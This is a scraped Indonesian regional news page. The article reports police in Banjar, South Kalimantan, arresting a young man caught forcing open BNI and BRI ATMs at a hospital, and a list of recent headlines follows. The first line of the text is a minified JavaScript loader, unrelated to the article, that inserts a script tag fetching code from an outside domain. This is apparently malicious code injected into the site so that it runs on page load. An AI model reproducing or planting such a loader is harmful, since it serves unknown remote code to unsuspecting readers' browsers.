(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Hukum

Sedang Bobol ATM BNI-BRI, AF Ditangkap Kala Beraksi


MARTAPURA, Resmob Polres Banjar berhasil menggagalkan pembobolan mesin Anjungan Tunai Mandiri (ATM) BNI dan BRI di Rumah Sakit Insan Mulia Desa Indrasari, Kecamatan Martapura, Kabupaten Banjar oleh seorang pemuda berinisial AF alias Ahul, Jum’at (5/5).

AF, sang pelaku pembobol mesin ATM depan di Rumah Sakit Insan Mulia terpaksa harus berurusan dengan polisi dan dibawa ke Mapolres Banjar bersama sejumlah barang bukti yang digunakan saat beraksi untuk mempertanggungjawabkan perbuatannya.

Kapolres Banjar AKBP Takdir Matanette saat menggelar jumpa awak media, Senin (7/5) mengungkapkan, kasus pembobolan mesin ATM ini masih dalam pengembangan, dan sementara hanya ada satu tersangka yang berhasil diamankan, beserta beberapa barang bukti yang dipergunakan tersangka saat melakukan aksinya.

“Pada Jum’at dini hari kemarin kita mendapatkan laporan dari warga, mengenai tingkah laku yang mencurigakan di sekitar ATM, kemudian kami bertindak cepat dengan mengirim anggota langsung ke lokasi yang dilaporkan yaitu gerai mesin ATM BNI dan BRI di Rumah Sakit Insan Mulia Desa Indrasari,” katanya.

Petugas yang melakukan pengintaian memergoki pelaku berinisial AF sedang berusaha untuk membongkar mesin ATM dengan sejumlah peralatan. “Beruntung petugas datang hingga aksi pelaku gagal dan keburu ditangkap,” ungkapnya.

Nette Boy -biasa disapa- menambahkan, dari keterangan pelaku modus aksi dengan berpura-pura untuk mengecek saldo di ATM, saat melihat situasi sekitar sepi, langsung beraksi membongkar mesin ATM dengan peralatan yang sudah disiapkan.

“Pelaku berpura-pura mengecek saldo rekening di mesin ATM, saat situasi sepi pelaku mulai membongkar mesin ATM dengan peralatan seperti pahat, tang, dan kayu. Dan saat dipergoki petugas, pelaku hampir saja berhasil membobol mesin ATM, terlihat dari bagian luar mesin ATM BNI maupun BRI sudah terbuka. Beruntung berkat kesigapan anggota Resmob Polres Banjar upaya pelaku pelaku bisa digagalkan,” jelasnya.

Diduga pelaku sempat melakukan aksinya sekitar dua jam, dan saat melihat petugas kepolisian, pelaku berusaha kabur, namun anggota Resmob Polres Banjar akhirnya berhasil menangkap pelaku tanpa ada perlawanan.

“Pelaku diduga sudah sekitar dua jam berada di dalam untuk membobol mesin ATM, dan pelaku mengaku sempat curiga yang mendatanginya ada lah polisi dan berusaha untuk kabur, namun keburu berhasil ditangkap anggota,” terangnya.

Selain itu, Takdir juga mengatakan, dari hasil introgasi, selama ini AF alias Ahul mengaku melakukan aksinya hanya sendiri, namun pihaknya tidak mudah percaya dan akan terus melakukan pengembangan.

“Dari pengakuan pelaku, dia hanya sendiri, tapi kami tidak mudah percaya dan akan terus melakukan pengembangan kasus ini, kalau dilihat dari peralatan yang dibawanya, tersangka sudah merencanakan melakukan aksinya,” bebernya.

Sementara itu, AF alias Ahul saat dimintai keterangan mengaku, hanya coba-coba melakukan pembokaran mesin ATM, dan ini pertama kalinya beraksi dan langsung kepergok hingga akhirnya berurusan dengan polisi. “Saya cuma coba-coba saja, dan ini pertama kalinya saya beraksi,” sesalnya.

Akibat perbuatannya, AF alias Ahul warga Desa Melayu Kecamatan Martapura Timur Kabupaten Banjar, terancam Pasal 363 KUHP, dengan ancaman di atas 5 tahun penjara. (hendera)

Reporter: Hendera
Editor: Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

3 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

5 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

5 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

6 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

7 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

8 jam ago

This website uses cookies.